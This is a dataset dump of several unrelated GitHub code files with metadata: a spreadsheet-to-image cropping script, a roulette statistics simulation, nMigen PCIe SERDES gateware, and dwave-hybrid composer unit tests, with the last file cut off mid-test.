os.path.basename(path)\n images = convert_from_path(path,dpi=400)\n #only get first page!\n image = images[0]\n \n print(\"Saving \" + name)\n width, height = image.size\n x,y,x2,y2 = cropRect\n newRect = [x*width, y*height, x2*width, y2*height]\n newRect = [int(item) for item in newRect]\n image = image.crop(newRect)\n image.save(name)\n\ndef processConfig(data):\n result = []\n for sectionName in data:\n section = data[sectionName]\n spreadsheetID = section['spreadsheet_id']\n sheetID = section['sheet_id']\n pdfName = 'output/' + sectionName+'.pdf'\n downloadFile(pdfName,spreadsheetID,sheetID)\n images = section['images']\n for image in images:\n convertPdf(pdfName, 'output/'+image, images[image])\n result.append('output/'+image)\n return result\n \nif __name__ == '__main__':\n try:\n os.mkdir('output')\n except:\n pass\n with open('config.json') as f:\n data = json.load(f)\n processConfig(data)", "repo_name": "alex-ong/CTMBracketScreenshot", "sub_path": "screenshot.py", "file_name": "screenshot.py", "file_ext": "py", "file_size_in_byte": 2568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.match", "line_number": 21, "usage_type": "call"}, {"api_name": "pycurl.Curl", "line_number": 29, "usage_type": "call"}, {"api_name": "certifi.where", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pdf2image.convert_from_path", "line_number": 58, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 86, "usage_type": "call"}, {"api_name": "json.load", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "18928479415", "text": "import random as rnd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef ruleta():\r\n\treturn rnd.randint(0,36)\r\n\r\ndef calcVP(results):\r\n\tc = 0\r\n\tfor j in results:\r\n\t\tc += j\r\n\treturn c/len(results)\r\n\r\niteraciones = 1000\r\nnumSim = 7\r\n\r\nfr = []\r\nvp = []\r\nv = []\r\nde = []\r\npromedio= [[],[],[],[]]\r\nfor i in range(iteraciones):\r\n\tpromedio[0].append(0)\r\n\tpromedio[1].append(0)\r\n\tpromedio[2].append(0)\r\n\tpromedio[3].append(0)\r\n\r\nfor j in range(numSim):\r\n\tx = rnd.randint(0,36)\r\n\tresults = []\r\n\tfrecRelativas = []\r\n\tvaloresProm = []\r\n\tdesvios = []\r\n\tvarianzas = []\r\n\tfor i in range(iteraciones):\r\n\t\tresult = ruleta()\r\n\t\tresults.append(result)\r\n\t\tfrecRelativas.append(results.count(x)/len(results))\r\n\t\tpromedio[0][i]=promedio[0][i]+results.count(x)/len(results)/numSim\r\n\t\tvaloresProm.append(calcVP(results))\r\n\t\tpromedio[1][i]=promedio[1][i]+calcVP(results)/numSim\r\n\t\tvar = np.var(results)\r\n\t\tvarianzas.append(var)\r\n\t\tpromedio[2][i]=promedio[2][i]+var/numSim\r\n\t\tdesvios.append(var**(1/2))\r\n\t\tpromedio[3][i]=promedio[3][i]+var**(1/2)/numSim\r\n\tfr.append(frecRelativas)\r\n\tvp.append(valoresProm)\r\n\tv.append(varianzas)\r\n\tde.append(desvios)\r\n\r\nfor i in range(numSim):\r\n\tplt.plot(fr[i], color='black')\r\nplt.plot(promedio[0], color='red')\r\nplt.hlines(1/37,0,iteraciones)\r\nplt.axis([0,iteraciones,0,0.4])\r\nplt.title(\"Frecuencia Relativa\")\r\nplt.ylabel('Fr del numero')\r\nplt.xlabel('n')\r\nplt.show()\r\n\r\nfor i in range(numSim):\r\n\tplt.plot(vp[i], color='black')\r\nplt.plot(promedio[1], color='red')\r\nplt.hlines(18,0,iteraciones)\r\nplt.title(\"Valor Promedio\")\r\nplt.ylabel('Valor medio')\r\nplt.xlabel('n')\r\nplt.show()\r\n\r\nfor i in range(numSim):\r\n\tplt.plot(v[i], color='black')\r\nplt.plot(promedio[2], color='red')\r\nplt.hlines(114,0,iteraciones)\r\nplt.title(\"Varianza\")\r\nplt.ylabel('Varianza')\r\nplt.xlabel('n')\r\nplt.show()\r\n\r\nfor i in range(numSim):\r\n\tplt.plot(de[i], color='black')\r\nplt.plot(promedio[3], color='red')\r\nplt.hlines(114**(1/2),0,iteraciones)\r\nplt.title(\"Desvío Estándar\")\r\nplt.ylabel('Desvío')\r\nplt.xlabel('n')\r\nplt.show()\r\n", "repo_name": "lautarocano/TP-Ruleta", "sub_path": "TP1-promedio.py", "file_name": "TP1-promedio.py", "file_ext": "py", "file_size_in_byte": 2017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randint", "line_number": 6, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "27292891839", "text": "from nmigen import *\nfrom nmigen.build import *\nfrom nmigen.hdl.ast import Part\nfrom nmigen.lib.fifo import AsyncFIFOBuffered\nfrom nmigen.lib.cdc import FFSynchronizer\n\nfrom enum import IntEnum\n\nfrom .align import SymbolSlip\nfrom .lfsr import PCIeLFSR\n\n\n__all__ = [\"PCIeSERDESInterface\", \"PCIeSERDESAligner\", \"PCIeScrambler\"]\n\n\ndef K(x, y): return (1 << 8) | (y << 5) | x\ndef D(x, y): return (0 << 8) | (y << 5) | x\n\nclass Ctrl(IntEnum):\n PAD = K(23, 7)\n STP = K(27, 7) # Start Transaction Layer Packet\n SKP = K(28, 0) # Skip\n FTS = K(28, 1) # Fast Training Sequence\n SDP = K(28, 2) # Start Data Link Layer Packet\n IDL = K(28, 3) # Idle\n COM = K(28, 5) # Comma\n EIE = K(28, 7) # Electrical Idle Exit\n END = K(29, 7)\n EDB = K(30, 7) # End Bad\n\nclass LinkSpeed(IntEnum):\n S2_5 = 1, # Speed of 2.5 GT/s, multiply timers by 2 by left shifting them by one bit\n S5_0 = 0, # Speed of 5 GT/s\n \n\n\n\nclass PCIeSERDESInterface(Elaboratable): # From Yumewatari\n \"\"\"\n Interface of a single PCIe SERDES pair, connected to a single lane. Uses 1:**ratio** gearing\n for configurable **ratio**, i.e. **ratio** symbols are transmitted per clock cycle.\n\n Parameters\n ----------\n ratio : int\n Gearbox ratio.\n\n rx_invert : Signal\n Assert to invert the received bits before 8b10b decoder.\n rx_align : Signal\n Assert to enable comma alignment state machine, deassert to lock alignment.\n rx_present : Signal\n Asserted if the receiver has detected signal.\n rx_locked : Signal\n Asserted if the receiver has recovered a valid clock.\n rx_aligned : Signal\n Asserted if the receiver has aligned to the comma symbol.\n\n rx_symbol : Signal(9 * ratio)\n Two 8b10b-decoded received symbols, with 9th bit indicating a control symbol.\n rx_valid : Signal(ratio)\n Asserted if the received symbol has no coding errors. If not asserted, ``rx_data`` and\n ``rx_control`` must be ignored, and may contain symbols that do not exist in 8b10b coding\n space.\n\n tx_locked : Signal\n Asserted if the transmitter is generating a valid clock.\n\n tx_symbol : Signal(9 * ratio)\n Symbol to 8b10b-encode and transmit, with 9th bit indicating a control symbol.\n tx_set_disp : Signal(ratio)\n Assert to indicate that the 8b10b encoder should choose an encoding with a specific\n running disparity instead of using its state, specified by ``tx_disp``.\n tx_disp : Signal(ratio)\n Assert to transmit a symbol with positive running disparity, deassert for negative\n running disparity.\n tx_e_idle : Signal(ratio)\n Assert to transmit Electrical Idle for that symbol.\n\n det_enable : Signal\n Rising edge starts the Receiver Detection test. Transmitter must be in Electrical Idle\n when ``det_enable`` is asserted.\n det_valid : Signal\n Asserted to indicate that the Receiver Detection test has finished, deasserted together\n with ``det_enable``.\n det_status : Signal\n Valid when ``det_valid`` is asserted. Indicates whether a receiver has been detected\n on this lane.\n \n frequency : int\n Maximum frequency in Hz\n speed : Signal()\n LinkSpeed enum value, indicates current speed\n \"\"\"\n def __init__(self, ratio=1):\n self.ratio = ratio\n\n self.rx_invert = Signal()\n self.rx_align = Signal()\n self.rx_present = Signal()\n self.rx_locked = Signal()\n self.rx_aligned = Signal()\n\n self.rx_symbol = Signal(ratio * 9)\n self.rx_valid = Signal(ratio)\n\n self.tx_symbol = Signal(ratio * 9)\n self.tx_set_disp = Signal(ratio)\n self.tx_disp = Signal(ratio)\n self.tx_e_idle = Signal(ratio)\n self.tx_locked = Signal()\n\n self.det_enable = Signal()\n self.det_valid = Signal()\n self.det_status = Signal()\n\n self.frequency = 0\n self.speed = Signal()\n\n self.reset = Signal()\n\n def elaborate(self, platform: Platform) -> Module:\n m = Module()\n return m\n\n\nclass PCIeSERDESAligner(PCIeSERDESInterface):\n \"\"\"\n A multiplexer that aligns commas to the first symbol of the word, for SERDESes that only\n perform bit alignment and not symbol alignment.\n \"\"\"\n def __init__(self, lane : PCIeSERDESInterface):\n self.ratio = lane.ratio\n\n self.rx_invert = lane.rx_invert\n self.rx_align = lane.rx_align\n self.rx_present = lane.rx_present\n self.rx_locked = lane.rx_locked\n self.rx_aligned = lane.rx_aligned\n\n self.rx_symbol = Signal(lane.ratio * 9)\n self.rx_valid = Signal(lane.ratio)\n\n self.tx_symbol = Signal(lane.ratio * 9)\n self.tx_set_disp = Signal(lane.ratio)\n self.tx_disp = Signal(lane.ratio)\n self.tx_e_idle = Signal(lane.ratio)\n\n self.det_enable = lane.det_enable\n self.det_valid = lane.det_valid\n self.det_status = lane.det_status\n\n self.frequency = lane.frequency\n self.speed = lane.speed\n\n self.reset = lane.reset\n\n self.__lane = lane\n\n def elaborate(self, platform: Platform) -> Module:\n m = Module()\n\n # Do TX CDC\n # FFSynchronizer\n if False:\n m.submodules += FFSynchronizer(Cat(self.tx_symbol, self.tx_set_disp, self.tx_disp, self.tx_e_idle), Cat(self.__lane.tx_symbol, self.__lane.tx_set_disp, self.__lane.tx_disp, self.__lane.tx_e_idle), o_domain=\"tx\", stages=4)\n \n # No CDC\n # TODO: Check if this actually works\n if False:\n m.d.comb += Cat(self.__lane.tx_symbol, self.__lane.tx_set_disp, self.__lane.tx_disp, self.__lane.tx_e_idle).eq(\n Cat(self.tx_symbol, self.tx_set_disp, self.tx_disp, self.tx_e_idle))\n\n # AsyncFIFOBuffered\n if True:\n tx_fifo = m.submodules.tx_fifo = AsyncFIFOBuffered(width=self.ratio * 12, depth=8, r_domain=\"tx\", w_domain=\"rx\")\n m.d.comb += tx_fifo.w_data.eq(Cat(self.tx_symbol, self.tx_set_disp, self.tx_disp, self.tx_e_idle))\n m.d.comb += Cat(self.__lane.tx_symbol, self.__lane.tx_set_disp, self.__lane.tx_disp, self.__lane.tx_e_idle).eq(tx_fifo.r_data)\n m.d.comb += tx_fifo.r_en.eq(1)\n m.d.comb += tx_fifo.w_en.eq(1)\n\n # Testing symbols\n if False:\n m.d.comb += self.__lane.tx_symbol.eq(Cat(Ctrl.COM, D(10, 2)))\n\n\n self.slip = SymbolSlip(symbol_size=10, word_size=self.__lane.ratio, comma=Cat(Ctrl.COM, 1))\n m.submodules += self.slip\n\n m.d.comb += [\n self.slip.en.eq(self.rx_align),\n self.slip.i.eq(Cat(\n (self.__lane.rx_symbol.word_select(n, 9), self.__lane.rx_valid[n])\n for n in range(self.__lane.ratio)\n )),\n self.rx_symbol.eq(Cat(\n Part(self.slip.o, 10 * n, 9)\n for n in range(self.__lane.ratio)\n )),\n self.rx_valid.eq(Cat(\n self.slip.o[10 * n + 9]\n for n in range(self.__lane.ratio)\n )),\n ]\n return m\n\n\nclass PCIeScrambler(PCIeSERDESInterface):\n \"\"\"\n Scrambler and Descrambler for PCIe, needs to be after an aligner\n \"\"\"\n def __init__(self, lane : PCIeSERDESInterface, enable = Signal()):\n self.ratio = lane.ratio\n\n self.rx_invert = lane.rx_invert\n self.rx_align = lane.rx_align\n self.rx_present = lane.rx_present\n self.rx_locked = lane.rx_locked\n self.rx_aligned = lane.rx_aligned\n\n self.rx_symbol = Signal(lane.ratio * 9)\n self.rx_valid = Signal(lane.ratio)\n\n self.tx_symbol = Signal(lane.ratio * 9)\n self.tx_set_disp = Signal(lane.ratio)\n self.tx_disp = Signal(lane.ratio)\n self.tx_e_idle = Signal(lane.ratio)\n\n self.det_enable = lane.det_enable\n self.det_valid = lane.det_valid\n self.det_status = lane.det_status\n\n self.enable = enable\n\n self.frequency = lane.frequency\n self.speed = lane.speed\n \n self.reset = lane.reset\n\n self.__lane = lane\n\n def elaborate(self, platform: Platform) -> Module:\n m = Module()\n\n # Scramble transmitted and received data, skip on SKP, reset on COM\n # TODO: Add case for when only one SKP character is received\n\n def scramble(input, output, enable):\n lfsr = PCIeLFSR(self.ratio, input[0:9] == Ctrl.COM, input[9:18] != Ctrl.SKP)\n m.submodules += lfsr \n with m.If(enable & (input[8] == 0)):\n m.d.rx += output[0:9].eq(lfsr.output[0:9] ^ input[0:9])\n with m.Else():\n m.d.rx += output[0:9].eq(input[0:9])\n \n with m.If(enable & (input[17] == 0)):\n with m.If(input[0:9] == Ctrl.COM): # TODO: This is a hack. Please fix.\n m.d.rx += output[9:18].eq(0xFF ^ input[9:18])\n with m.Else():\n m.d.rx += output[9:18].eq(lfsr.output[9:18] ^ input[9:18])\n if (self.ratio > 2):\n for i in range(2, self.ratio):\n m.d.rx += output[9 * i : 9 * i + 9].eq(Mux(input[9 * i : 9 * i + 9][8], 0, lfsr.output[9 * i : 9 * i + 9]) ^ input[9 * i : 9 * i + 9])\n with m.Else():\n for i in range(1, self.ratio):\n m.d.rx += output[9 * i : 9 * i + 9].eq(input[9 * i : 9 * i + 9])\n \n\n #with m.If(self.enable & (self.__lane.rx_symbol[8] == 0)):\n # with m.If(self.__lane.rx_symbol[0:9] == Ctrl.COM):\n # m.d.rx += self.rx_symbol.eq(0x1FE00 ^ self.__lane.rx_symbol)\n # with m.Else():\n # m.d.rx += self.rx_symbol.eq(rx_lfsr.output ^ self.__lane.rx_symbol)\n #with m.Else():\n # m.d.rx += self.rx_symbol.eq(self.__lane.rx_symbol)\n\n scramble(self.__lane.rx_symbol, self.rx_symbol, 1)\n scramble(self.tx_symbol, self.__lane.tx_symbol, self.enable)\n\n # This is necessary because the scrambling already takes one clock cycle\n m.d.rx += self.rx_valid.eq(self.__lane.rx_valid)\n\n #with m.If(self.enable & (self.tx_symbol[8] == 0)):\n # with m.If(self.tx_symbol[0:9] == Ctrl.COM):\n # m.d.rx += self.__lane.tx_symbol.eq(0x1FE00 ^ self.tx_symbol)\n # with m.Else():\n # m.d.rx += self.__lane.tx_symbol.eq(tx_lfsr.output ^ self.tx_symbol)\n #with m.Else():\n # m.d.rx += self.__lane.tx_symbol.eq(self.tx_symbol)\n\n m.d.rx += self.__lane.tx_set_disp.eq(self.tx_set_disp)\n m.d.rx += self.__lane.tx_disp .eq(self.tx_disp)\n m.d.rx += self.__lane.tx_e_idle .eq(self.tx_e_idle)\n\n return m", "repo_name": "usbalex/ECP5-PCIe", "sub_path": "Gateware/ecp5_pcie/serdes.py", "file_name": "serdes.py", "file_ext": "py", "file_size_in_byte": 10941, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.IntEnum", "line_number": 19, "usage_type": "name"}, {"api_name": "enum.IntEnum", "line_number": 31, "usage_type": "name"}, {"api_name": "nmigen.lib.cdc.FFSynchronizer", "line_number": 166, "usage_type": "call"}, {"api_name": "nmigen.lib.fifo.AsyncFIFOBuffered", "line_number": 176, "usage_type": "call"}, {"api_name": "align.SymbolSlip", "line_number": 187, "usage_type": "call"}, {"api_name": "nmigen.hdl.ast.Part", "line_number": 197, "usage_type": "call"}, {"api_name": "lfsr.PCIeLFSR", "line_number": 249, "usage_type": "call"}, {"api_name": "lfsr.output", "line_number": 252, "usage_type": "attribute"}, {"api_name": "lfsr.output", "line_number": 260, "usage_type": "attribute"}, {"api_name": "lfsr.output", "line_number": 263, "usage_type": "attribute"}]} +{"seq_id": "42679460587", "text": "import itertools\nimport unittest\n\nimport numpy as np\nimport networkx as nx\nfrom plucky import pluck\n\nimport dimod\n\nfrom hybrid.core import State, States, SampleSet\nfrom hybrid import traits\nfrom hybrid.composers import (\n IdentityComposer, SplatComposer, GreedyPathMerge,\n MergeSamples, ExplodeSamples, SliceSamples, AggregatedSamples,\n IsoenergeticClusterMove)\nfrom hybrid.utils import min_sample, max_sample, random_sample\n\n\nclass TestIdentityComposer(unittest.TestCase):\n problem = dimod.BinaryQuadraticModel({}, {'ab': 1, 'bc': 1, 'ca': 1}, 0, dimod.SPIN)\n samples = [{'a': 1, 'b': 1, 'c': -1}]\n\n def test_default(self):\n \"\"\"Subsamples are copied to samples.\"\"\"\n\n state = State(\n subproblem=None,\n subsamples=SampleSet.from_samples_bqm(self.samples, self.problem))\n\n nextstate = IdentityComposer().next(state)\n self.assertEqual(state.subsamples, nextstate.samples)\n\n def test_traits_enforced(self):\n \"\"\"Sample composers require `problem`, `samples` and `subsamples`.\"\"\"\n\n with self.assertRaises(traits.StateTraitMissingError):\n IdentityComposer().run(State()).result()\n with self.assertRaises(traits.StateTraitMissingError):\n IdentityComposer().run(State(problem=True)).result()\n with self.assertRaises(traits.StateTraitMissingError):\n IdentityComposer().run(State(problem=True, samples=True)).result()\n self.assertTrue(\n IdentityComposer().run(State(problem=True, samples=True, subsamples=True)).result())\n\n\nclass TestSplatComposer(unittest.TestCase):\n problem = dimod.BinaryQuadraticModel({}, {'ab': 1, 'bc': 1, 'ca': 1}, 0, dimod.SPIN)\n samples = [{'a': +1, 'b': +1, 'c': +1},\n {'a': -1, 'b': -1, 'c': -1}]\n subproblem = dimod.BinaryQuadraticModel({}, {'bc': 1}, 0, dimod.SPIN)\n subsamples = [{'b': -1, 'c': +1},\n {'b': +1, 'c': +1}]\n composed = [{'a': +1, 'b': -1, 'c': +1},\n {'a': -1, 'b': +1, 'c': +1}]\n\n def test_default(self):\n \"\"\"All subsamples are combined with all the samples.\"\"\"\n\n state = State.from_samples(self.samples, self.problem).updated(\n subproblem=self.subproblem,\n subsamples=SampleSet.from_samples_bqm(self.subsamples, self.subproblem))\n\n nextstate = SplatComposer().next(state)\n\n self.assertEqual(nextstate.samples,\n SampleSet.from_samples_bqm(self.composed, self.problem))\n\n def test_dtype(self):\n bqm = dimod.BQM.from_ising({'a': 0}, {})\n init = State.from_problem(bqm)\n state = init.updated(subsamples=init.samples)\n\n nextstate = SplatComposer().next(state)\n\n init_dtype = state.samples.record.sample.dtype\n next_dtype = nextstate.samples.record.sample.dtype\n self.assertEqual(init_dtype, next_dtype)\n\n def test_traits_enforced(self):\n \"\"\"Sample composers require `problem`, `samples` and `subsamples`.\"\"\"\n\n with self.assertRaises(traits.StateTraitMissingError):\n SplatComposer().run(State()).result()\n with self.assertRaises(traits.StateTraitMissingError):\n SplatComposer().run(State(problem=True)).result()\n self.assertTrue(\n # problem and samples are included by default\n SplatComposer().run(State(\n problem=self.problem, subproblem=self.subproblem,\n samples=SampleSet.from_samples_bqm(self.samples, self.problem),\n subsamples=SampleSet.from_samples_bqm(self.subsamples, self.subproblem))).result())\n\n\nclass TestGreedyPathMerge(unittest.TestCase):\n\n def test_basic(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1, 'bc': -1, 'ca': 1}, 0, dimod.SPIN)\n state = State.from_sample(min_sample(bqm), bqm)\n antistate = State.from_sample(max_sample(bqm), bqm)\n\n result = GreedyPathMerge().run(States(state, antistate)).result()\n\n self.assertEqual(result.samples.first.energy, -3.0)\n\n\nclass TestMergeSamples(unittest.TestCase):\n\n def test_single(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1}, 0, dimod.SPIN)\n\n states = States(State.from_sample({'a': 1, 'b': -1}, bqm))\n\n state = MergeSamples().run(states).result()\n\n self.assertEqual(state, states[0])\n\n def test_multiple(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1}, 0, dimod.SPIN)\n\n states = States(State.from_sample({'a': 1, 'b': -1}, bqm),\n State.from_sample({'a': -1, 'b': 1}, bqm))\n\n expected = State.from_samples([{'a': 1, 'b': -1}, {'a': -1, 'b': 1}], bqm)\n\n state = MergeSamples().run(states).result()\n\n self.assertEqual(state, expected)\n\n def test_aggregation(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1}, 0, dimod.SPIN)\n\n states = States(State.from_sample({'a': 1, 'b': -1}, bqm),\n State.from_sample({'a': 1, 'b': -1}, bqm))\n\n expected = State(\n problem=bqm,\n samples=dimod.SampleSet.from_samples_bqm(\n {'a': 1, 'b': -1}, bqm, num_occurrences=[2]))\n\n state = MergeSamples(aggregate=True).run(states).result()\n\n self.assertEqual(state, expected)\n\n\nclass TestExplodeSamples(unittest.TestCase):\n\n def test_empty(self):\n \"At least one input sample is required.\"\n\n bqm = dimod.BQM.from_ising({}, {'ab': 1})\n\n inp = State(problem=bqm, samples=None)\n with self.assertRaises(ValueError):\n ExplodeSamples().run(inp).result()\n\n inp = State(problem=bqm, samples=SampleSet.empty())\n with self.assertRaises(ValueError):\n ExplodeSamples().run(inp).result()\n\n def test_single(self):\n \"One input sample should produce one output state with that sample.\"\n\n bqm = dimod.BQM.from_ising({}, {'ab': 1})\n\n inp = State.from_sample({'a': 1, 'b': 1}, bqm)\n\n exp = States(inp.updated())\n\n out = ExplodeSamples().run(inp).result()\n\n self.assertEqual(out, exp)\n\n def test_simple(self):\n \"Two output states created for two input samples, in correct order.\"\n\n bqm = dimod.BQM.from_ising({}, {'ab': 1})\n\n inp = State.from_samples([{'a': 1, 'b': 1},\n {'a': -1, 'b': 1}], bqm)\n\n exp = States(State.from_sample({'a': 1, 'b': 1}, bqm),\n State.from_sample({'a': -1, 'b': 1}, bqm))\n\n out = ExplodeSamples().run(inp).result()\n\n self.assertEqual(out, exp)\n\n\nclass TestSliceSamples(unittest.TestCase):\n\n def test_bottom_n(self):\n energies = list(range(10))\n sampleset = dimod.SampleSet.from_samples(np.ones((10, 1)), dimod.SPIN, energy=energies)\n state = State(samples=sampleset)\n\n bottom = SliceSamples(3).run(state).result()\n self.assertEqual(bottom.samples, sampleset.truncate(3))\n\n bottom = SliceSamples().run(state, stop=3).result()\n self.assertEqual(bottom.samples, sampleset.truncate(3))\n\n def test_top_n(self):\n energies = list(range(10))\n sampleset = dimod.SampleSet.from_samples(np.ones((10, 1)), dimod.SPIN, energy=energies)\n state = State(samples=sampleset)\n\n top = SliceSamples(-3, None).run(state).result()\n self.assertTrue((top.samples.record.energy == energies[-3:]).all())\n\n top = SliceSamples().run(state, start=-3).result()\n self.assertTrue((top.samples.record.energy == energies[-3:]).all())\n\n def test_middle_n(self):\n energies = list(range(10))\n sampleset = dimod.SampleSet.from_samples(np.ones((10, 1)), dimod.SPIN, energy=energies)\n state = State(samples=sampleset)\n\n mid = SliceSamples(3, -3).run(state).result()\n self.assertTrue((mid.samples.record.energy == energies[3:-3]).all())\n\n mid = SliceSamples(1, -1).run(state, start=3, stop=-3).result()\n self.assertTrue((mid.samples.record.energy == energies[3:-3]).all())\n\n\nclass TestAggregatedSamples(unittest.TestCase):\n\n def test_aggregation(self):\n energies = list(range(10))\n sampleset = dimod.SampleSet.from_samples(np.ones((10, 1)), dimod.SPIN, energy=energies)\n state = State(samples=sampleset)\n\n result = AggregatedSamples(aggregate=True).run(state).result()\n\n self.assertEqual(len(result.samples), 1)\n self.assertEqual(result.samples.record.sample, np.array([1]))\n\n def test_spread(self):\n energies = [1, 2]\n occurrences = [3, 2]\n sampleset = dimod.SampleSet.from_samples(\n [{'a': 1}, {'a': 2}], dimod.SPIN,\n energy=energies, num_occurrences=occurrences)\n state = State(samples=sampleset)\n\n result = AggregatedSamples(aggregate=False).run(state).result()\n\n # we'll have n=5 samples\n n = sum(occurrences)\n self.assertEqual(len(result.samples), n)\n\n # samples, energies and num_occurrences must be expanded\n np.testing.assert_array_equal(result.samples.record.sample,\n np.array([[1], [1], [1], [2], [2]]))\n np.testing.assert_array_equal(result.samples.record.energy,\n np.array([1, 1, 1, 2, 2]))\n np.testing.assert_array_equal(result.samples.record.num_occurrences,\n np.ones(n))\n\n # variables should stay the same\n self.assertEqual(list(sampleset.variables), list(result.samples.variables))\n\n\nclass TestICM(unittest.TestCase):\n\n @staticmethod\n def total_energy(states):\n \"\"\"Combined energy of all samples in all states.\"\"\"\n return sum(float(sum(state.samples.record.energy)) for state in states)\n\n def test_validation(self):\n bqm1 = dimod.BinaryQuadraticModel({'a': 1}, {}, 0, dimod.SPIN)\n bqm2 = dimod.BinaryQuadraticModel({'b': 1}, {}, 0, dimod.SPIN)\n s1 = State.from_sample({'a': +1}, bqm1)\n s2 = State.from_sample({'b': -1}, bqm2)\n\n # two input states required\n with self.assertRaises(ValueError):\n inp = States(s1, s1, s1)\n IsoenergeticClusterMove().run(inp).result()\n\n # variables must match\n with self.assertRaises(ValueError):\n inp = States(s1, s2)\n IsoenergeticClusterMove().run(inp).result()\n\n def test_triangle_flip(self):\n bqm = dimod.BQM.from_qubo({'ab': 1, 'bc': 1, 'ca': 1})\n s1 = State.from_samples({'a': 0, 'b': 1, 'c': 1}, bqm)\n s2 = State.from_samples({'a': 1, 'b': 0, 'c': 1}, bqm)\n\n icm = IsoenergeticClusterMove()\n inp = States(s1, s2)\n res = icm.run(inp).result()\n\n # Expected: ('a', 'b') identified as (the sole) cluster, selected,\n # resulting in variables {'a', 'b'} flipped. Effectively, input states\n # are simply swapped.\n self.assertEqual(res[0].samples, 